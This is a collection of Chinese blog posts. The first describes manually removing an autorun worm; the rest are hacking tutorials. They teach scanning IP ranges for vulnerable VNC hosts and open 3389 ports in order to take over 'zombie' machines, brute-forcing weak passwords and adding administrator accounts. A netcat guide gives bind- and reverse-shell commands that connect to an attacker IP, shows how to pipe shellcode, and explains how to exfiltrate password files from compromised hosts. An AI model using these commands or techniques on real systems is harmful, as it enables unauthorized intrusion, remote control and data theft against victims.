于是我和陈哥开始研究手动杀, 大概半个小时之后被陈哥清除掉了 .

晚上下班去了网吧,  因为清除病毒的时候发现有autorun.inf, 我怀疑这个东西已经传到我的手机和笔记本里了,  去网吧一看果然有.  回寝室之后发现果然笔记本也中了,今天休息, 抽点时间研究了下.

dtajxne.exe的症状如下:
每个分区下都有隐藏文件”xiwiiuy.exe”和”autorun.inf”.
通过任务管理器查看进程有dtajxne.exe和akpfhtq.exe
很多程序, 比如杀毒软件和ie的窗口打开会被自动关闭
使用msconfig命令查看系统启动时发现两项自启动项:”C:\Program Files\Common Files\System\akpfhtq.exe”与”C:\Program Files\Common Files\Microsoft Shared\dtajxne.exe”

解决方法:

在msconfig中禁用 dtajxne.exe和akpfhtq.exe无效, 在注册表中删除相关键值也无效, 病毒主程序meex.exe在windows下看不到.

在网上看了很多帖子都要进入ntfsdos下进行查杀, 但不知道为什么我用光盘进入ntfsdos下还是无法访问ntfs的目录, 所以放弃了这个方法.

没办法只能尝试用安装盘中的windows xpe, 在xpe下删除了”C:\Program Files\Common Files\System\”和”C:\Program Files\Common Files\Microsoft Shared\”目录中的dtajxne.exe和akpfhtq.exe,在”C:\Program Files\”下删除了meex.exe,然后进入每个分区删除隐藏文件”xiwiiuy.exe”和”autorun.inf”,接下来启动windows xp, 在注册表中搜索dtajxne.exe,akpfhtq.exe和xiwiiuy.exe,将相关键值全部清理掉,最后运行msconfig,禁用”C:\Program Files\Common Files\System\akpfhtq.exe”和”C:\Program Files\Common Files\Microsoft Shared\dtajxne.exe”,退出msconfig重启电脑,病毒清除.

VNC漏洞利用工具包括两部分vscan.exe(在一些工具包中也叫VNC_bypauth.exe),主要用来扫描有vnc漏洞的主机.还有一个VNCLink.exe,这个也就是VNC Viewer,是一款vnc连接工具,类似3389.

国外很多的计算机都开启了vnc服务,我们可以利用vnc漏洞来进行抓肉鸡.

vscan的使用格式如下

vscan.exe -i StarIP-EndIP -p Port  -vnc -Option

例子:

vscan.exe -i 192.168.0.0-192.168.255.255 -p 5900 -vnc -vv

扫描完毕vscan会将结果保存在VNC_pauth.txt文件中.

文件内容如下

[php]—————————————————————————-
COMMAND: vscan.exe -i 192.168.0.0-192.168.255.255 -p 5900 -vnc -w
—————————————————————————-
192.168.139.170  :5900     connection closed
192.168.139.170  :5900     vnc4:banned
192.168.139.23   :5900     vnc4:patched
192.168.139.122  :5900     vnc4:patched
192.168.139.188  :5900     vnc4:patched
192.168.139.75   :5900     vnc4:banned
192.168.139.160  :5900     vnc4:VULNERABLE
192.168.139.181  :5900     vnc4:banned
192.168.139.251  :5900     vnc4:patched
192.168.139.89   :5900     vnc4:banned
192.168.139.110  :5900     vnc4:patched
—————————————————————————-
Scan complete
——————————————–[heapoverflow.com 2004-2005]—-[/php]

类似192.168.139.160  :5900     vnc4:VULNERABLE这样后面有vnc4:VULNERABLE的就是可以连接的主机了,可以用VNCLink.exe直接连接.

如果连接上去的时候对方没有锁定计算机,那么恭喜你,你已经拿到一台肉鸡了.

因为扫描后要手动连接主机去验证主机是否可以控制,那么不停的连接就会变的很麻烦,这里给大家提供一个我自己写的工具来自动筛选可连接ip并且生成批处理程序自动进行连接,

工具地址 http://www.foolbird.net/online/vnc/

将你的vnc viewer路径填上,再将VNC_pauth.txt的内容粘贴到文本框中,然后进行生成,当出现结果页的时候查看网页的源代码,然后以.bat格式保存就可以了.

然后就可以用所生成批处理文件来进行自动连接了.

附件:vnc.rar(143206 Byte)

我把最近收集的nc.exe的使用方法整理了一下,发给大家.

另外还找到了一款改编后的可视化的nc,也提供给大家.

========================================================

软件介绍：

工具名：Netcat
作者：Hobbit && Chris Wysopal
类别：开放源码
平台：Linux/BSD/Unix/Windows
WINDOWS下版本号：[v1.10 NT]

========================================================

参数介绍：

*nc.exe -h*即可看到各参数的使用方法。
基本格式：nc [-options] hostname port[s] [ports] …
nc -l -p port [options] [hostname] [port]

-d 后台模式
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出–用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉–用于扫描时

端口的表示方法可写为M-N的范围格式。

========================================================

基本用法：

1)连接到REMOTE主机，例子：
格式：nc -nvv 192.168.x.x 80
讲解：连到192.168.x.x的TCP80端口

2)监听LOCAL主机，例子：
格式：nc -l -p 80
讲解：监听本机的TCP80端口

3)扫描远程主机，例子：
格式：nc -nvv -w2 -z 192.168.x.x 80-445
讲解：扫描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主机绑定SHELL，例子：
格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe
讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5)REMOTE主机绑定SHELL并反向连接，例子：
格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口

以上为最基本的几种用法（其实NC的用法还有很多，
当配合管道命令”|”与重定向命令”<”、”>”等等命令功能更强大……）。

========================================================

高级用法：

6)作攻击程序用，例子：
格式1：type.exe c:exploit.txt|nc -nvv 192.168.x.x 80
格式2：nc -nvv 192.168.x.x 80 < c:exploit.txt
讲解：连接到192.168.x.x的80端口，并在其管道中发送*c:exploit.txt*的内容(两种格式确有相同的效果,真是有异曲同工之妙.

附：*c:exploit.txt*为shellcode等

7)作蜜罐用[1]，例子：
格式：nc -L -p 80
讲解：使用*-L*(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止

8)作蜜罐用[2]，例子：
格式：nc -L -p 80 > c:log.txt
讲解：使用*-L*可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到*c:log.txt*中，如果把*>* 改为*>>*即可以追加日志

附：*c:log.txt*为日志等

9)作蜜罐用[3]，例子：
格式1：nc -L -p 80 < c:honeypot.txt
格式2：type.exe c:honeypot.txt|nc -L -p 80
讲解：使用*-L*可以不停地监听某一个端口，直到ctrl+c为止，并把*c:honeypot.txt*的内容*送*入其管道中

10) 后门

victim machine: //受害者的机器

nc -l -p port -e cmd //win2000

nc -l -p port -e /bin/sh //unix,linux

attacker machine: //攻击者的机器.

nc ip -p port //连接victim_IP,然后得到一个shell。

11)反向连接

attacker machine: //一般是sql2,远程溢出,webdavx3攻击.

//或者wollf的反向连接.

nc -vv -l -p port

victim machine:

nc -e cmd attacker ip -p port

nc -e /bin/sh attacker ip -p port

或者：

attacker machine:

nc -vv -l -p port1 /*用于输入*/

nc -vv -l -p prot2 /*用于显示*/

victim machine:

nc attacker_ip port1 　 cmd 　 nc attacker_ip port2

nc attacker_ip port1 　 /bin/sh 　 nc attacker_ip port2

139要加参数-s（nc -L -p 139 -d -e cmd -s 对方机器IP）

这样就可以保证nc优先于NETBIOS。

12)传送文件：

从肉鸡拖密码文件回来.

nc -d -l -p port < pathfiledest 　　　 /*attacker machine*/ 可以shell执行

nc -vv attacker_ip port > pathfile.txt /*victim machine*/ 需要Ctrl+C退出

//肉鸡需要gui界面的cmd里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.

上传命令文件到肉鸡

nc －vv -l -p port > pathfile.txt　　　　　 /*victim machine*/ 需要Ctrl+C退出

nc -d victim_ip port < pathfiledest 　 /*attacker machine*/ 可以shell执行

//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.

结论: 可以传输ascii,bin文件.可以传输程序文件.

问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc .

或者只有再次连接使用pskill 杀掉进程.但是是否释放传输文件打开的句柄了?

13) 端口数据抓包.

nc -vv -w 2 -o test.txt www.m4ker.net 80 21-15

< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error

< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command “” unr

< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized…

< 00000084 83 00 00 01 8f # …..

14) telnet,自动批处理。

nc victim_ip port < pathfile.cmd 　 /*victim machine*/ 显示执行过程.

nc -vv victim_ip port < pathfile.cmd 　 /*victim machine*/ 显示执行过程.

nc -d victim_ip port < pathfile.cmd 安静模式.

_______________file.cmd________________________

password

cd %windir%

echo []=[%windir%]

c:

cd

md test

cd /d %windir%system32

net stop sksockserver

snake -config port 11111

net start sksockserver

exit

附件:nc.exe(59392 Byte)

附件:mvnc.exe(188928 Byte)

图片附件:

刚刚查了下资料

病毒名称：Virus.Win32.Dzan.a（Kaspersky）

　　　　　 清除Virus.Win32.Dzan.a后：Trojan.Win32.VB.atg（Kaspersky）

病毒

别名：Worm.Suser.a（瑞星）

病毒大小：110,592 字节

　　　　　 清除Virus.Win32.Dzan.a后：45,056 字节

加壳方式：N/A

样本MD5：3dc040cb3a352a8577f44a1ff8ef8ca8

样本SHA1：acf12d3a843126cc98efd9f8e77c1cf14b027a70

发现时间：2006.11

更新时间：2006.11

关联病毒：

传播方式：通过恶意网页传播，其它木马下载，可移动存储设备（如U盘、MP3、移动硬盘）、

最后找到了专杀工具把它彻底干掉了.

附件:tel_xls_exe.rar(22444 Byte)

用法:scanner TCP/SYN StartIP [EndIP] Ports [Threads] [/Banner] [/Save]

参数说明:
      TCP/SYN     -> TCP方式扫描或SYN方式扫描(SYN扫描需要在win 2k或以上系统才行),SYN扫描对本机无效
      StartIP     -> 起始扫描的IP
      EndIP       -> 结束扫描的IP,可选项,如果这一项没有，就只是对单个IP扫描
      Ports       -> 可以是单个端口，连续的一段端口或非连续的端口
      Threads     -> 使用最大线程数去扫描(SYN扫描不需要加这一项),不能超过1024线程
      /Banner     -> 扫描端口时一并将Banner显示出来,这一选项只对TCP扫描有效
      /Save       -> 将结果写入当前目录的Result.txt文件中去

   
   我们先点击开始菜单—>运行—>CMD.EXE，因为我把扫描器放在F盘，你们的扫描器放哪你们就进哪里，
打开S扫描器，下面我举几个例子演示下S扫描器的主要几个作用。
 
例子一:
S TCP 218.80.12.1 218.80.12.123 80 512
TCP扫描218.80.12.1到218.80.12.123这IP段中的80端口,最大并发线程是512

例子二：
S TCP 218.80.12.1 218.80.12.123 21,5631 512 /Banner
TCP扫描218.80.12.1到218.80.12.123这IP段中的21和5631端口,最大并发线程是512,并显示Banner

例子三：
S TCP 218.80.12.1 218.80.12.12 1-200 512
TCP扫描218.80.12.1到218.80.12.12这IP段中的1到200端口,最大并发线程是512

例子四：
S TCP 218.80.12.7 1-200 512
TCP扫描218.80.12.7这IP中的1到200端口,最大并发线程是512

例子五：
S SYN 218.80.12.7 1-65535 /Save
SYN扫描218.80.12.7这IP中的1到65535端口,将结果写入Result.txt
扫描结束后Result.txt就存放在你的S扫描器所在的硬盘里，就是这个文档。刚才扫描的东西都在里面。

例子六：
S SYN 218.80.12.1 218.80.12.255 21 /Save
TCP扫描218.80.12.1到218.80.12.255这IP段中的21端口,将结果写入Result.txt
这个我重点说明一下，因为这条命令就是专门用来找肉鸡的，扫描一个IP段有没有开3389的或1433的
我示范下：S SYN 218.80.1.1 218.80.255.255 3389 /Save （找开放3389肉鸡的指令，矮鸟要牢记哦）
我晕哦，好多开了3389的，大家只要利用这指令扫到开3389的IP，再用别工具继续扫开了3389的肉鸡的弱口令
找到了马上建立管理员，登陆进去，你就算得到一个肉鸡了，由于本动画不是教找肉鸡的，我也不进行操作了

注意:
1.SYN扫描是很依赖于扫描者和被扫描者的网速的,如果你是内网的系统，那你不一定可以使用SYN扫描的
，因为你的网关的类型会决定内网系统是否能进行SYN扫描.如果你的配置较低的话，我也不推荐使用
SYN扫描.SYN扫描速度是比TCP扫描的速度快很多的，但在稳定性方面却不是太好，所以自己决定使用
哪种模式进行扫描。
2.SYN扫描不需要线程那个参数，请看上面例子5和6
3.TCP扫描的最大并发线程不能超过1024.
4.使用SYN模式扫描，不能扫描Banner,具体为什么不能，请查看有关SYN的资料。

附件:s.exe(8192 Byte)

附件:s.rar(689328 Byte)